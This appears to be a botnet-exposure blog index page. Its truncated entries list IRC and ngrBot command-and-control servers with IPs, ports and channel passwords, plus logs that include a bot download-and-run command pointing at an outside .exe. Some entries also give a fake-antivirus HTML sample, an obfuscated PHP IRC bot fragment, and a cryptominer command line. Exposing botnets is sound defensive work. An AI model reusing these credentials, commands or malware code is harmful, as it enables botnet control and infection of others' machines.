Some of u heckers prob remember h1t3m the australian guy who got caught and send to prison for infecting like 3k people i found some nice logs and as u can see it was not so hard to find him he even tell his real name to buyers who wanted to buy his spack haveRead more...
xlaazer.no-ip.info(irc botnet hosted in United States Goose Creek Comcast Cable Communications Inc)
Resolved : [xlaazer.no-ip.info] To [76.23.217.80] Remote Host Port Number xlaazer.no-ip.info 8080 PASS none Clients: I have 91 clients and 0 servers Local users: Current Local Users: 91 Max: 1522 Global users: Current Global Users: 91 Max: 296 i dont have the exe file to find channels hosting infos: http://whois.domaintools.com/76.23.217.80
b4nb1n0.dyndns.tv(ngrBot hosted in Spain Ovh Systems)
Domains used for controlling the botnet b4nb1n0.dyndns.tv active d11.dyndns.tv 0csf15.dyndns.tv Resolved : [b4nb1n0.dyndns.tv] To [178.33.116.27] server: b4nb1n0.dyndns.tv PASS b4nb1 Local users: Current Local Users: 82 Max: 92 Global users: Current Global Users: 82 Max: 92 NICK n{USA|XPa}hrczwsa USER hrczwsa 0 0 :hrczwsa JOIN #hola juli26 Now talking in #hola Modes On: [ #hola ] [Read more...
Fake Antivirus Example
html file is encrypted u have to decrypt the encrypted(base64) part if u want to have more from this malware open the html file in sandboxie to see what it does virtest.html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head> <title>Wait a minute! This is important - we check your devices.</title> <meta http-equiv="Content-Type" content="text/html;Read more...
91.121.171.64(irc botnet hosted in France Ovh Systems)
ip:port 91.121.171.64:9040 nick xUVEuwU user cjfsiemx channel #j channel #c channel #m Now talking in #j Topic On: [ #j ] [ =KN4iPk89Ohci3Sn1FY5LY8datYLj+i4PAPQuBzYYTyPX97LYmPrRD9RhXU0Gj5Kp5qfZU6LVVw90Ax ] Topic By: [ y ] Now talking in #c Topic On: [ #c ] [ =qZw7/pkZ+h/Oi7VdGwYNa63Gdfp77grj2Awm4eqQ+xsz+tuggMYRZyQXWSVqN+7dBpeSdeEvC1MRGecRP2XBE8Vh/Xl ] Topic By: [ y ] UPDATE: 91.121.171.64:4676 Now talking in #balengor Topic On: [Read more...
sssssss.devhoster.com(irc botnet hosted in China Beijing Chinanet Hunan Province Network)
Remote Host Port Number sssssss.devhoster.com 6971 PASS laorosr UPDATE: Remote Host Port Number sssssss.devhoster.com 4030 PASS eee sssssss.devhoster.com 5060 PASS eee NICK kmmmxji USER ygrjllh “” “hkw” :ygrjllh for more look here http://www.exposedbotnets.com/search?q=PASS+laorosr hosting infos: http://whois.domaintools.com/175.6.1.159
gang.sexpil.net(Linux bots hosted in United States Truckee Softcom America Inc)
Another bot from Tijn Resolved : [gang.sexpil.net] To [216.224.184.101] <?php @set_time_limit(0); @error_reporting(0); class HbZheTqekEkqwtqTQ { var $ttwtzTtWQWwhzbN = array("BbWEWnHeTTwqnNhb"=>"gang.sexpil.net", "eBwz"=>"23232", "ZnQWe"=>"scary", "KqkktZ"=>"13", "KtWqnhZ"=>"#wWw#", "tZQ"=>"scan", "NneBweEZz"=>"41aa15390e2efa34ac693c3bd7cb8e88", "eWNTTTEhbQ"=>".", "BbzWWQkbNBb"=>"a87710e60dee7645081a8fc2fab74dbd"); var $users = array(); /* txZET4EZRnuKkWrlW8MjP0M46fREwjEPHtjqoOf51zFbmWn9VZiBQVvM0chmmL2T5c9jQffIFLK */ function yySydpvYj($host) { $this->users[$host] = true; } function SjSpsYm($msg) { fwrite($this->rIiuOioIR,"$msgrn"); } function aGGAJSAgavgjADGa() { $chars = 'abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789'; $size = strlen($chars);Read more...
xxxd2.com(ngrBot hosted in United States Clarks Summit Volumedrive)
Resolved : [xxxd2.com] To [199.168.140.38] Remote Host Port Number 173.192.224.115 80 199.15.234.7 80 199.168.140.38 7777 PASS Eshuxx NICK n{US|XPa}evkfwgc USER evkfwgc 0 0 :evkfwgc JOIN #eshu Eshuxx PRIVMSG #eshu :[d=”http://www.fotosprivadas.com/chicas/update/Ruco.exe” s=”172032 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 Sample hosting infos: http://whois.domaintools.com/199.168.140.38
new.pusikuracbre.me(CoinMiner hosted in Russian Federation Selectel Ltd.)
From same lamer here http://www.exposedbotnets.com/search?q=8332 Sample Sample Sample Resolved : [new.pusikuracbre.me] To [31.186.102.181] Resolved : [new.pusikuracbre.me] To [31.186.102.180] Resolved : [new.pusikuracbre.me] To [31.186.102.155] Running process miner.exe -a 60 -g no -o http://new.pusikuracbre.me:8332/ -u d38a39ys_l3kpy -p el29djggss Xandora results here hosting infos: http://whois.domaintools.com/31.186.102.180
75.77.40.195(ngrBot hosted in United States Greenville Windstream Nuvox Inc)
Remote Host Port Number 199.15.234.7 80 75.77.40.195 6668 PASS ngrBot PRIVMSG #asiksi# :[DNS]: Blocked “windowsupdate.microsoft.com” NICK n{US|XPa}vxpwwmw USER vxpwwmw 0 0 :vxpwwmw JOIN #asiksi# asdr3ny PRIVMSG #asiksi# :[DNS]: Blocked “www.microsoft.com” PRIVMSG #asiksi# :[DNS]: Blocked “microsoft.com” PRIVMSG #asiksi# :[DNS]: Blocked “update.microsoft.com” Now talking in #asiksi# Topic On: [ #asiksi# ] [ .mod usbi on .mdns www.microsoft.comRead more...